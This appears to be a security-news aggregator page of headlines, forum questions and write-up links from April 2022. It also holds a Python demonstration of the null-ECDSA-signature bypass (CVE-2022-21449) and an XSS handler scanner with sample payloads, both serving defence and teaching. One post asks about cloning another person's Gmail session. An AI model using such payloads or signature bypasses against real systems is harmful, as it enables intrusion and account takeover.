    A compendium of 2021 network and data security regulations, policies, national standards and reports
    This article comprehensively collects China's 2021 security-related policies, regulations and industry reports for reference by practitioners.
    FreeBuf morning brief | Anonymous has leaked a cumulative 5.8TB of Russian data; record growth in security vulnerabilities
    Since declaring cyber war on Russia, Anonymous has now published about 5.8TB of Russian data.
    Re-examining the value of threat intelligence in light of the hacking of Europe's supercomputers
    Not long ago, supercomputers in several European countries were hit by a crypto-mining wave of unprecedented scale.
    Atlassian fixes a critical Jira authentication bypass vulnerability
    Threat actors can trigger the vulnerability by sending specially crafted HTTP requests to the vulnerable software.
    PoC code for the Java cryptography vulnerability is public; affected versions should upgrade as soon as possible
    The vulnerability has been fixed, but since the PoC code is now public, affected versions should be patched promptly to prevent exploitation.
    Since declaring war on Russia, Anonymous has leaked a cumulative 5.8TB of data
    Since Anonymous declared cyber war on Russia, it has published about 5.8TB of Russian data.
    Costa Rica's national finance systems hit by ransomware: tax and customs at a standstill
    Costa Rica, in Central America, was attacked by Conti ransomware; large numbers of systems across several ministries were paralysed and large amounts of sensitive data were stolen.
    Hands-on network log correlation analysis on the OSSIM platform
    This article briefly introduces network log correlation analysis on the OSSIM platform, in the hope that it offers some help.
  • Open

    Beginners Guide to 0day/CVE AppSec Research
    Article URL: https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html Comments URL: https://news.ycombinator.com/item?id=31152385 Points: 2 # Comments: 0
  • Open

    Bypass the Docker Firewall by Abusing REST API
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Tons of gifs and jpegs of Tolkien from Silmarillion and Lord of the Rings
    submitted by /u/FireHole [link] [comments]
  • Open

    [Translation] BPF ring buffer: use cases, core design and sample programs (2020)
    Translator's preface: this article is a translation of a 2020 piece by BPF core developer Andrii Nakryiko, "BPF ring buffer". It describes the problems the BPF ring buffer solves and the design behind it, and gives code examples and links to kernel patches; with both depth and breadth, it is an excellent reference for learning the ring buffer. Given the translator's limited ability, omissions or errors are inevitable; if in doubt, consult the original. The translation follows.
    Contents:
    Translator's preface
    1 Improvements of ringbuf over perfbuf
    1.1 Lower memory overhead
    1.2 Guaranteed event ordering
    1.3 Less wasted data copying
    2 ringbuf use cases and performance
    2.1 Ordinary scenarios
    2.2 High-throughput scenarios
    2.3 Non-maskable interrupt (NMI) scenarios
    2.4 Summary
    3 Sample programs (show me the code)
    3.1 perfbuf example: kernel BPF program; user-space program
    3.2 ringbuf example: kernel BPF program; user-space program
    3.3 ringbuf reserve/commit API example: principle; limitations; kernel BPF program; user-space program
    4 ringbuf event notification control
    4.1 Event notification overhead
    4.2 How perfbuf handles it
    4.3 How ringbuf handles it
    5 Summary
    In many scenarios a BPF program needs to send data to user space. The BPF perf buffer (perfbuf) is currently the de facto standard for this, but it has some problems, such as wasted memory (because of its per-CPU design) and no guarantee of event ordering. As an improvement, kernel 5.8 introduced another new BPF data structure: the BPF ring buf…

  • Open

    Hosting for video game servers?
    http://zsr.site.nfoservers.com/ submitted by /u/n0stal6ic [link] [comments]
  • Open

    Methods for bypassing Windows Defender in Red Team operations
    Hello. In this piece we will go over some command lines on how to get rid of Windows Defender. Let's go. Continue reading on Medium »
  • Open

    Secret from HackTheBox — Detailed Walkthrough
    No content preview
    THM: Raz0rBlack
    No content preview
    How to perform a basic SQL Injection Attack? — Ethical Hacking
    No content preview
  • Open

    --libcurl code injection via trigraphs
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1548535
  • Open

    Shared folder accessed by unauthorized third party?
    Windows 10. A shared external hard drive on my network was making continuous noises as if it were reading/writing large amounts of data. The noises would stop the second I moved my mouse and started using my machine. This happened on at least 2 occasions. I was pretty suspicious of this, and went and realized I had forgotten to make the hard drive unshared. I had previously shared it so I could back up files from my laptop before formatting. When I attempted to make the drive unshared, it said a user was connected to it, and asked if I was sure I wanted to make it unshared while a user was connected. This spooked me quite a bit. My main questions: Is it possible it was talking about my laptop? Are there legitimate Windows 10 processes that can cause a hard drive to make read/write noises when the computer is not in use? submitted by /u/Exact_Frosting_1197 [link] [comments]
    Clone gmail logged in google chrome browser to another laptop
    Is there any way to clone a Gmail login in the Google Chrome browser to another laptop? Ex: User A is logged in to Gmail on Google Chrome using Laptop1. User B wants to clone User A's Chrome with his Gmail login on Laptop2. Please suggest any way? Note: User B has full access to User A's Laptop1. submitted by /u/hasitha1989 [link] [comments]
  • Open

    Process Herpaderping (Mitre:T1055)
    Introduction: Johnny Shaw demonstrated a defense evasion technique known as process herpaderping in which an attacker is able to inject malicious code into the mapped… The post Process Herpaderping (Mitre:T1055) appeared first on Hacking Articles.
  • Open

    War in Ukraine / April 23
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    10 search engines you have never heard of
    Little-known search engines for OSINT practitioners and journalists: they find what Google cannot. A review of the 10 best anonymous search engines. Continue reading on KR. LABORATORIES IT BLOG »
    Midnight Flag CTF 2022 — OSINT Write-up
    On the night of 23 to 24 April 2022, the Midnight Flag "Infektion" CTF took place, organised by the students of ESNA (home page… Continue reading on Medium »
    WHAT INTERDISCIPLINARY PATHS TOWARDS A GENERAL THEORY OF OSINT?
    For almost two decades now I have argued that OSINT, understood as a discipline, deserves a theoretical construct that is robust, reliable, well… Continue reading on Medium »
    SPY NEWS: 2022 — Week 16
    Summary of the espionage-related news stories for the Week 16 (17–23 April) of 2022. Continue reading on Medium »
  • Open

    EvtxHussar 1.0
    Hi, I recently wrote a tool in Golang which will help me in my forensics work by dumping the most common Event IDs from various Windows Event logs (PowerShell, Security, System etc.). Events are highly configurable as they are placed in external YAML files. It differentiates logs by the Computer field of the last event in the .evtx file, so extra logs from VSS, Archive and backups can be included easily. The project is based on the evtx library used in Velociraptor. Link to tool: https://github.com/yarox24/EvtxHussar
    Current categories supported:
    - PowerShell (including ScriptBlock reconstruction)
    - Account related modifications
    - Audit log cleared
    - Process creation (including Sysmon)
    - Scheduled Tasks (including extra parsing of XML Content if present) - Creation/Modification and Execution
    - Services
    In future I plan to add YAML definitions for:
    - Logon events (Yes, this one is important)
    - RDP events
    - WinRM events
    - and others
    Output formats:
    - Excel (Default)
    - CSV
    - JSON
    - JSONL
    Maybe it will be useful for some of you submitted by /u/Yarox45 [link] [comments]
    svchost.exe without '-k' is this a malware ?
    Hello, I did some log investigations in Azure Sentinel and found this process. In a YouTube video I saw that an svchost.exe process without '-k' is something suspicious. How can I investigate this without access to the VM? The folder path is C:\Windows\System32. Things on cloud are different from on-premise in my opinion. Thanks. submitted by /u/Agent_B99 [link] [comments]
    Crawl through directories when exporting to CSV in autopsy
    So, I'm examining a system that has several folders within folders whose files I would like to export to CSV. Rather than exporting the items in each folder individually, is there a way to crawl through directories to export the info of all files contained in each folder? submitted by /u/roku77 [link] [comments]
    Any options for Samsung T7 touch SSD?
    I have an encrypted Samsung T7 Touch external SSD to process. I have access to most forensic tools. What would be the best option, or is it hopeless (AES-256)? submitted by /u/james1234cb [link] [comments]
  • Open

    SecWiki News 2022-04-24 Review
    Analysis of 0-day exploitation in 2021 by ourren; Enterprise security: a brief discussion of red-vs-blue exercises, part 2 by ourren; Enterprise security: a brief discussion of red-vs-blue exercises, part 1 by ourren; "VirusTotal 2021 Annual Malware Trends Report" by Avenger. For more of the latest articles, visit SecWiki
  • Open

    AppSec tales III — Password Recovery
    Guidelines for application security testing of the password recovery form. Continue reading on Medium »
    Redis Exploit Tool
    This tool is for personal security research only. Continue reading on Medium »
    Mobile Security Framework (MobSF) Setup — Kali Linux and Windows
    Hello everyone. In this blog I will explain the installation steps for the MobSF framework on Kali Linux and Windows. Continue reading on Medium »
  • Open

    "Precise" static analysis | Keen Lab's automated static vulnerability detection tool for binaries is now open source
    Author: Tencent Keen Security Lab. Original link: https://mp.weixin.qq.com/s/x6jNNvkWRJt1YcHMakWHEg Introduction: To improve the efficiency and scalability of static analysis for vulnerability detection in binary files, Keen Lab has incubated and open-sourced BinAbsInspector, a static vulnerability analysis tool for binaries. Repository: https://github.com/KeenSecurityLab/BinAbsInspector Background: Soft...
    The More You Know, The More You Know You Don’t Know: a review of 0-days exploited in the wild in 2021
    Author: Maddie Stone @ Google Project Zero. Translator: Knownsec 404 Lab translation team. Original link: https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html This is our third annual review of 0-days exploited in the wild [2020, 2019]. Every year we review...
  • Open

    Pwn2Own 2022 Miami concludes; last spring's champion retains Master of Pwn
    Champion in both 2021 and 2022
    FreeBuf morning brief | Conti claims responsibility for the attack on Costa Rica; Wawa sues Mastercard
    QNAP firmware update fixes the Apache HTTP vulnerability in its NAS devices.
    Join the "Zero Trust Security Forum" on 19 May for an online conversation about security
    As cyber threats become more diverse, the traditional security perimeter can no longer meet the security needs of enterprise remote work.
    Lapsus$ hacking group breached T-Mobile's internal systems
    T-Mobile confirmed that the Lapsus$ extortion gang broke into its network "several weeks ago" using stolen credentials and gained access to internal systems.
    Crypto-mining malware sets its sights on Docker servers
    The Lemon_Duck botnet operators are running a Monero crypto-mining campaign, with the Docker API as their primary target.
    US government awards $12 million to six universities to develop cyber attack and defence tools
    The US Department of Energy (DOE) announced $12 million in funding for six university teams to develop cyber attack and defence tools that protect US energy delivery systems from cyber attacks.
    US declares web scraping legal; a trillion-strong army of crawlers stirs beneath the surface
    As competition on the internet intensifies, competition over online assets will only grow fiercer; scraper attacks have become the primary threat to enterprises' online assets.
    How to choose the best encryption method for a database
    Encryption is the universal process for keeping data safe. In this article we explore different encryption methods so that you can store information securely in a database.
  • Open

    Profiling a Personal Portfolio of Personal Photos and Security Event Conference Photos - A Compilation
    Folks, who's on Facebook? Feel free to send me an invitation request and let's catch up. The following photos are a personal Facebook photos compilation which you can feel free to go through in terms of catching up on what I've been up to.
  • Open

    FREE ICS related CTF presented by CISA
    submitted by /u/1winway [link] [comments]
  • Open

    Atlassian fixes critical Jira authentication bypass vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-0540 Comments URL: https://news.ycombinator.com/item?id=31140284 Points: 2 # Comments: 0

  • Open

    Super easy manipulation Led to full NFT control
    First of all, I'll not disclose any information about this Web3 project; I'll just give an example of what has already been done. Continue reading on NetworkingSec »
    Beginner’s Guide of Bug Bounty By Arth Bajpai
    Hello everyone, I was thinking about writing something, so I thought why not on the most asked question, which is how to start in bug… Continue reading on Medium »
    How I Got Swag From Race Condition
    Hello all, hope you are having a great time! I am Moin Khokhar, aka Silentknight.bug. This is my first time; please forgive me if any grammar… Continue reading on Medium »
    HOW I GOT ACCESS TO THE DATABASE INFORMATION OF A LARGE UNIVERSITY.
    WORDPRESS VULNERABILITY. Continue reading on Medium »
    How I got Apple Hall Of Fame !
    Continue reading on Medium »
    Walkthrough of “Insecure Deserialization”- PentesterAcademy
    Hello all, This Blog will provide a walkthrough of “Insecure Deserialization Lab” by PentesterAcademy. Continue reading on Medium »
  • Open

    Bluetooth vulnerability in smart Covid test patched, the second to do so
    Article URL: https://www.scmagazine.com/analysis/device-security/bluetooth-vulnerability-in-smart-covid-test-patched-the-second-to-do-so Comments URL: https://news.ycombinator.com/item?id=31136445 Points: 3 # Comments: 0
    Psychic Signatures (Java Vulnerability)
    Article URL: https://www.youtube.com/watch?v=502iGDxuiRk Comments URL: https://news.ycombinator.com/item?id=31130598 Points: 1 # Comments: 0
  • Open

    Renderers can obtain access to random bluetooth device without permission
    Internet Bug Bounty disclosed a bug submitted by palmeral: https://hackerone.com/reports/1519099 - Bounty: $480
    Attacker can bypass authentication built on ingress external auth (`nginx.ingress.kubernetes.io/auth-url`)
    Kubernetes disclosed a bug submitted by thisbug: https://hackerone.com/reports/1357948 - Bounty: $500
  • Open

    Writing a zero findings pentest report
    submitted by /u/DiabloHorn [link] [comments]
    Are vulnerability scores misleading you? Understanding CVSS severity and using them effectively
    submitted by /u/MiguelHzBz [link] [comments]
    Cliam: better cloud agnostic IAM permissions enumerator. Covers AWS and GCP, but more to come!
    submitted by /u/securisec [link] [comments]
  • Open

    Email OSINT
    Today I will talk about sources designed to identify the identities of the owners of email addresses in the framework of OSINT research… Continue reading on Medium »
    War in Ukraine / April 22
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Services for checking and monitoring websites and servers
    A collection of online services for checking, monitoring and maintaining hosts: sites, domains, servers. Monitoring of electronic resources. Continue reading on KR. LABORATORIES IT BLOG »
    Will AI swallow OSINT?
    From a forecasting standpoint… a more than legitimate question. Continue reading on Medium »
    What is there for automated detection of deepfakes?
    Fake Profile Detector (Deepfake, GAN) — this AI model only works on StyleGAN images used to create fake human faces of people that don’t… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-23 Review
    No new items today. For more of the latest articles, visit SecWiki
  • Open

    Problem after problem: a roundup of the "cyber security incidents" Tesla has recently experienced
    Recently, controversies over Tesla's data handling, and even incidents of its systems being cracked and data leaked, have occurred from time to time. This article, covering both China and abroad, rounds up the cyber security incidents Tesla has encountered.
  • Open

    Offensive con 2022 Talks
    submitted by /u/dmchell [link] [comments]
  • Open

    What else can I be doing to bolster my resume and increase my chances of breaking into the field after I graduate?
    Hello, I am 75% completed with my Bachelors in Cybersecurity and I am trying to do everything I possibly can to break into the field when I graduate. I have lurked the cybersecurity subreddits heavily and have picked up a lot of the general advice. I have obtained my A+, Net+, and Sec+. I have started a homelab and have been doing various exercises within it to get my hands on as many different programs/tools/operating systems/etc as I can. I am learning Python and have made a Github account where I have posted a few basic scripts I have made and will continue to post more as I keep practicing. I have participated in numerous CTFs both small and on the national scale and have placed well in some of them and added them to my LinkedIn. I have started a blog and have been posting just general writeups and blog posts of CTFs or whatever I'm doing within Cybersec at the time. I am working through TryHackMe and have been able to manage a few boxes on HackTheBox. I am sending out resumes to try and find an internship, but I don't seem to be having luck in other states and the state I am in is atrocious for jobs. I plan on leaving forever once I graduate. What else can I be doing to make my resume look good? I'm much more talented at the Blue team side (Packet/Log Analysis, Steg, etc) when I do CTFs, but have a greater interest in red team. I have been eyeing both the Security Blue Team Level 1 and TCM Security's new PNPT cert. They are both relatively cheap and seem like extremely good knowledge that would help me in an interview. submitted by /u/BTBricktop [link] [comments]
    Network still trying to connect to kaspersky labs even though uninstalled
    Edit: I solved this (credit to Jay Jay on the Sophos UTM forum). It's from my Sophos firewall. I had added Kaspersky in my network definitions. My router is trying to resolve the domain, while my Pi-hole is blocking it. I removed the network definition entry and the queries stopped. Thanks to all those who helped. Hello, this may be the better subreddit to ask this. I uninstalled Kaspersky a few months ago from 2 of my computers (PC and Surface Pro) for obvious reasons. I used Revo Uninstaller Pro so it also scans the registry and deletes some remnants of it. I still notice in my Pi-hole logs that it keeps trying to connect to it (I blocked it). It is my top blocked domain. How can I trace whatever it is that is trying to connect to Kaspersky Labs on my PC and remove it? Thanks. Edit: I have powered off my PC (switched off at the power supply), unplugged my ethernet cable, force shutdown my Surface Pro using the cmd /s /f /t 0 option and put it outside wifi range in my car, and I still get queries every minute. I'll try Wireshark to see where the request is coming from and update. submitted by /u/eijisawakita [link] [comments]

  • Open

    Starting a Career
    I passed my OSCP a few months ago. Is that really enough to begin a career? I understand it's literally the floor for expectations (being able to use google, and a general idea of report writing) but it really doesn't feel like it. It sounds insane but I haven't even applied yet for a job because of the absolutely astounding work I've seen online by fellow info sec enthusiasts. It's a high bar of expectation that I doubt I'd be able to fulfill, even if the "actual" job's probably more akin to sending out emails about password policies submitted by /u/smol-dumb-and-gay [link] [comments]
    I'm Looking for a Honeypot for Threat Intel
    Thinking about renting a VPS for threat intel and possibly IOCs. No web, just SSH, and maybe with an up-to-date vuln library. What's your go-to honeypot? submitted by /u/No_Bumblebee_5793 [link] [comments]
    How to purge emails from Cloud Exchange (E3 license, E5 security)
    Hi all, recently ran into an issue where someone sent an internal email with information they shouldn't have. Typically, to purge these emails I would use KnowBe4 or Office 365's Security and Compliance: eDiscovery. We've used both methods, but this was a way larger scale and there are still emails floating around. Some people responded to it or forwarded it. Let's pretend the title was "ABC". We have three subjects then: "ABC", "RE: ABC", "FW: ABC". We've searched these subjects in eDiscovery and purged the results. It's still not pulling everything, as they are still in people's mailboxes. Meaning... those exact subject lines are still being found in users' inboxes. Office 365's Security and Compliance: eDiscovery: the search is done through here, which gets a collection of emails. We then purge those via PowerShell. Stuck here as there are plenty still around. Anybody have tools in E5 security they use for this? submitted by /u/compguyguy [link] [comments]
    How is this possible? If your accounts/devices are “taken over” is it possible that you can see the persons browsing history? Also could you see some of their iCloud downloads in your file folder and possibly pics?
    I am seeing business related websites, sale boosting and had a random picture show up when I was adding a new widget. submitted by /u/00miagv00 [link] [comments]
    How do you stay secure?
    Hey, everyone. So I know that there are subs for VPN's, password managers and such. But the information over there is either people arguing that the VPN they use is the best or just shills for NordVPN, Express, etc. So I thought (and hopefully it is okay) if I asked some actual security experts what you do to stay private and secure? If it's allowed, what VPN's or password managers do you use? Or do you use proxies? Or do you not use anything at all? Encrypted email? Any top of the line anti virus software? Or just having the knowledge of not being dumb on the internet? Are all of these privacy clients even worth it? I know that the first and foremost course of action is having some sense when it comes to the internet; i.e. Not clicking on suspicious links, not downloading random files, etc. But I would assume these programs have their pros, right? I am getting into the cyber security world and there is just SO many companies out there so I just thought I would ask some people who actually are in this field. I hope that is okay! ​ Thanks submitted by /u/strings_on_a_hoodie [link] [comments]
    Average lifetime of an IoC
    Hello threat analyst stranger, for you, and based on your experience, what is the average lifetime of an IoC? The goal here is to automate IoC requalification. When should I requalify my IoCs :) I would say: Hash: 10 days; Domain: 1 month; IP: 5 months. Thank you! submitted by /u/Immediate-Sentence-4 [link] [comments]
    Can an ISP see what browser you’re using and do they see your browsing history or traffic any differently whether you’re using Chrome or Firefox?
    Can an ISP see what browser you’re using and do they see your browsing history or traffic any differently whether you’re using Chrome or Firefox? submitted by /u/Available-Fly7541 [link] [comments]
    About information on security news
    Hello, I'm a newbie who is studying security. I'm looking for a blog or page about security, so is there anyone who can share one? I like the latest security news, OSINT and search engines, and articles about vulnerabilities, which I'm most interested in. I'm writing here because I want to hear a lot of news and information. submitted by /u/Alexiosplana [link] [comments]
    Computer Recognition Authentication
    I'm interested in this form of authentication, but can't seem to find a heck of a lot about it; can anyone point me in the right direction to learn more? submitted by /u/ahpto [link] [comments]
  • Open

    Mainly memes; some OSTs and bass boosted songs (many memes are NSFW)
    https://dl.abstract.land/ submitted by /u/steamsy_ [link] [comments]
  • Open

    GEO-LOCATION WITHOUT STREET VIEW
    This might be coming out late, but hey better be late than never. Continue reading on Osintfun »
    War in Ukraine / April 21
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    WHAT IS THE I-SPHERE
    Ideas, values and content for disciplinary innovation in Open and Original Source Intelligence Continue reading on Medium »
    Finding Luther — An OSINT Geo location Challenge.
    London was an amazing terrain to do GEOINT. Its intricate small roads in between the buildings made it more complex & beautiful. To my… Continue reading on Medium »
  • Open

    A Detailed Guide on Hydra
    Hello! Pentesters, this article is about the brute-forcing tool Hydra. Hydra is one of the favourite tools of security researchers and consultants. Being an excellent… The post A Detailed Guide on Hydra appeared first on Hacking Articles.
  • Open

    Any CREST CPIA guidance for help?
    Hello guys, I decided to take the CPIA exam; however, other than the syllabus CREST recommends, I can't find any other extra information. I am really interested in the forensic pathway, but there is really little guidance or advice I can refer to. :( submitted by /u/NoIdeaForMyFuture [link] [comments]
    M.2 Drive
    Can you create an image of an M.2 drive? Is the process the same as any other HDD or are there any restrictions? submitted by /u/Beep-Boop-Bop-Boop [link] [comments]
    Encase problem in question
    submitted by /u/Metriczcaptian88 [link] [comments]
  • Open

    No Hardware, No Problem: Emulation and Exploitation
    submitted by /u/0xdea [link] [comments]
    The Illustrated QUIC Connection
    submitted by /u/syncsynchalt [link] [comments]
    WSO2 RCE (CVE-2022-29464) exploit and writeup
    submitted by /u/0xdea [link] [comments]
    Hardware Security Talks Announced! Hardwear.io
    submitted by /u/hardweario [link] [comments]
    Abusing Azure Container Registry Tasks from Specter-Ops
    submitted by /u/gdraperi [link] [comments]
    Null ECDSA Signatures - Proof of concept for bypassing JWT signature checks using CVE-2022-21449
    submitted by /u/thorn42 [link] [comments]
    Smashing the Modern Web Tech Stack — Part 1: The Evolving Threat Landscape in 2022 and DOM-based XSS in Cloud-Native React Apps
    submitted by /u/MalwareJoe [link] [comments]
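The "Null ECDSA Signatures" proof of concept listed above (CVE-2022-21449, the "Psychic Signatures" bug that the Java PoC item further up the page also refers to) comes down to an ECDSA verifier that never checked that r and s lie in the range [1, n-1]. What follows is an added example, not code from the linked PoC or from any JDK source: a textbook P-256 ECDSA signer and verifier in pure Python, with the range check behind a flag so the same function can run as a correct verifier and as a model of the flawed one. The modelling of the flaw (a Fermat-style inverse that returns 0 for s = 0, and the point at infinity compared as x = 0) is an assumption stated in the comments; the key pair, nonce and message are constructed for the example, and the message is only a stand-in for a JWS signing input.

```python
import hashlib

# NIST P-256 domain parameters (FIPS 186-4 / SEC 2).
P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
A = P - 3
B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
G = (0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,
     0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5)
INF = None  # the point at infinity, represented as None


def ec_add(p1, p2):
    """Affine point addition on P-256 (doubling when p1 == p2)."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return INF                      # p1 == -p2
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, pt):
    """Double-and-add scalar multiplication; ec_mul(0, pt) is INF."""
    result, addend = INF, pt
    while k:
        if k & 1:
            result = ec_add(result, addend)
        addend = ec_add(addend, addend)
        k >>= 1
    return result


def hash_to_int(msg):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big")


def sign(msg, d, k):
    """Textbook ECDSA over P-256 with SHA-256. k is a parameter only so the
    example is reproducible; a real signer draws a fresh random k every time."""
    z = hash_to_int(msg)
    r = ec_mul(k, G)[0] % N
    s = pow(k, -1, N) * (z + r * d) % N
    return (r, s)


def verify(msg, sig, q, check_range=True):
    """ECDSA verification. With check_range=False this models the verifier
    behind CVE-2022-21449 (assumed model of the flaw, see the comments)."""
    r, s = sig
    if check_range and not (1 <= r < N and 1 <= s < N):
        return False
    # Fermat-style inverse s^(n-2) mod n: correct for 1 <= s < n, but
    # silently 0 when s == 0 rather than an error.
    w = pow(s, N - 2, N)
    u1 = hash_to_int(msg) * w % N
    u2 = r * w % N
    x_point = ec_add(ec_mul(u1, G), ec_mul(u2, q))
    # For r = s = 0 both scalars are 0 and x_point is INF. A projective
    # representation of INF carries x == 0, so the comparison r == x succeeds.
    x = 0 if x_point is INF else x_point[0]
    return x % N == r


def parse_es256_signature(raw):
    """JWS ES256 signatures are the raw 64-byte concatenation r || s."""
    if len(raw) != 64:
        raise ValueError("ES256 signature must be 64 bytes")
    return int.from_bytes(raw[:32], "big"), int.from_bytes(raw[32:], "big")


# Constructed key pair, nonce and message for the example (test values only).
PRIV = 0x1234567890ABCDEF1234567890ABCDEF1234567890ABCDEF1234567890ABCDEF
PUB = ec_mul(PRIV, G)
K = 0x7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A7A
MSG = b"eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJhZG1pbiJ9"  # stand-in JWS signing input

if __name__ == "__main__":
    good = sign(MSG, PRIV, K)
    blank = parse_es256_signature(bytes(64))
    print("genuine signature, strict verifier:", verify(MSG, good, PUB))
    print("blank signature, strict verifier  :", verify(MSG, blank, PUB))
    print("blank signature, flawed verifier  :", verify(MSG, blank, PUB, check_range=False))
```

With the range check on, an all-zero ES256 signature is rejected before any curve arithmetic runs; with it off, (0, 0) verifies for every key and every message, which is why a blank signature passed JWT checks. The fixed nonce K exists only to make the example reproducible; reusing a nonce in real signing leaks the private key.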
  • Open

    Removing the Stigma of a CVE
    Article URL: https://github.blog/2022-04-22-removing-the-stigma-of-a-cve/ Comments URL: https://news.ycombinator.com/item?id=31123900 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-04-22 Review
    TheRoadOfSO: notes from learning security operations by ourren. For more of the latest articles, visit SecWiki
  • Open

    ontransitionend XSS based on CSS transitions
    @garethheyes has come up with yet another new XSS vector: the ontransitionend event handler. This handler fires when a transition, that is a CSS animation, finishes, and for it to fire the element has to be in the focused state. display: block; transition: outline 1s; test Starting from the code above, let's look a little further. CSS Transition: a transition is a CSS value that specifies the animation speed when a property changes. It takes the CSS property to animate and a time value, as shown below.
    Metasploit data into Httpx?
    It feels like a while since I last wrote about Metasploit. The reason is that I found a plugin called netpen; with it, information collected by Metasploit can be fed through a pipeline into other tools such as nuclei, zap/burp and so on, which looked useful. Netpen is not an official plugin but a plugin script written by wdahlenburg; it builds a combo list in host:port form from the information Metasploit has collected. It's a simple job, but parsing the data back out after collecting it with Metasploit is a bit of a chore, and this plugin solves exactly that. https://github.com/wdahlenburg/MSF-Plugins/blob/main/netpen.rb Add plugin: fetch the code from the repo and put it in Metasploit's plugin directory.
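The ontransitionend vector described in the first entry of this group is a good illustration of why a server-side filter that blocks a fixed list of event-handler attribute names keeps falling behind the browser: every new handler a browser adds is a handler the list does not know. The following is an added example, not code from the original post or from @garethheyes: a small Python scanner that reports any attribute whose name begins with "on", set against a blocklist that predates ontransitionend. The blocklist contents and the sample markup are constructed for the example; the payload only mirrors the shape of the vector described above (a focusable element with an outline transition and an ontransitionend handler) and is not the original code.

```python
from html.parser import HTMLParser

# A blocklist of event handlers as an older filter might carry it.
# ontransitionend is absent on purpose: browsers keep adding handlers, and a
# fixed list has no way of knowing about the ones added after it was written.
LEGACY_BLOCKLIST = {"onclick", "onload", "onerror", "onmouseover", "onfocus", "onblur"}


class EventHandlerScanner(HTMLParser):
    """Collect (tag, attribute, value) for every attribute that looks like an
    event handler. html.parser lowercases attribute names, so ONTRANSITIONEND
    and ontransitionend are treated alike, and self-closing tags are routed
    through handle_starttag by the base class."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append((tag, name, value or ""))


def scan_event_handlers(html):
    """Prefix rule: every on* attribute is reported, whether or not it is known."""
    scanner = EventHandlerScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def scan_with_blocklist(html):
    """Blocklist rule: only handlers named in LEGACY_BLOCKLIST are reported."""
    return [f for f in scan_event_handlers(html) if f[1] in LEGACY_BLOCKLIST]


# Constructed sample: a focusable element whose outline transition ends shortly
# after it receives focus, at which point ontransitionend fires. This is an
# assumed payload shape for the example, not the vector from the original post.
SAMPLE = (
    '<div tabindex="1" style="transition: outline 1s" '
    'ontransitionend="alert(document.domain)">focus me</div>'
    '<img src="x" onerror="alert(1)">'
)

if __name__ == "__main__":
    print("prefix rule   :", scan_event_handlers(SAMPLE))
    print("blocklist rule:", scan_with_blocklist(SAMPLE))
```

The blocklist run reports only the img onerror handler and lets the ontransitionend element through; the prefix run reports both. The prefix rule is itself only a detector: a production sanitizer should allowlist the tags and attributes it accepts and drop everything else, rather than enumerate what to reject.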
  • Open

    34 year old starting in Exploit Development, got a chance ?
    Hello there. I've done some pentesting work and jobs, but I have a passion to get into the exploit development and cracking field and am looking forward to getting a real-life job. However, I am 34 years old; do I still have a chance or will I be wasting my time? submitted by /u/morizk90 [link] [comments]
  • Open

    How I Bypass 2FA while Resetting Password
    It was a private program on "HackerOne". I had set a target in my mind that I had to bypass 2FA, so I checked every method to bypass "Two… Continue reading on InfoSec Write-ups »
    Pythonic Malware Part-2: Reversing Python Executables
    In Pythonic Malware Part-1, I demonstrated how Python executables can be used to bypass Windows Defender and successfully launch… Continue reading on InfoSec Write-ups »
    A Facebook Bug that Disclosed Unused Custom Thumbnails of Any Facebook Page’s Public Videos
    No content preview
  • Open

    1-click RCE in Electron Applications
    How simple link opening leads to RCE Continue reading on Medium »
    Userland City — HackTheBox — Challenge — Web Exploitation — Writeup
    Hello guys I am back to posting another writeup. So let’s start talking instead of wasting our time lol. Continue reading on Medium »
    Neonify — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back to another writeup. So today we are talking about Neonify Web challenge. So let’s start talking about it. Continue reading on Medium »
    Nginxatsu — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys we are back to posting another writeup about Web Exploitation challenge on HackTheBox. So let’s start talking about it. Continue reading on Medium »
    Aave V3’s Price Oracle Manipulation Vulnerability
    On April 7th, after Aave V3 had been launched for 3 weeks, we discovered an issue in Aave V3’s price oracle. To be more specific, the… Continue reading on Medium »

    FBI: BlackCat ransomware has breached at least 60 entities worldwide
    Between November 2021 and March 2022, the BlackCat ransomware gang breached the network systems of at least 60 organizations worldwide.
    Five Eyes alliance issues advisory warning of Russian cyberattacks
    The Five Eyes alliance's cybersecurity agencies issued a joint advisory warning that Russian-backed attackers may launch cyberattacks against critical infrastructure.
    FreeBuf Enterprise Group Topic Discussion | Talking about corporate HW exercises
    With this year's HW exercise approaching, what new offensive and defensive trends will there be? What self-inspection plans can be carried out before the exercise? What strange incidents have you encountered during an exercise?
    ALAC audio format has vulnerabilities; the privacy of more than half of Android users worldwide is at risk
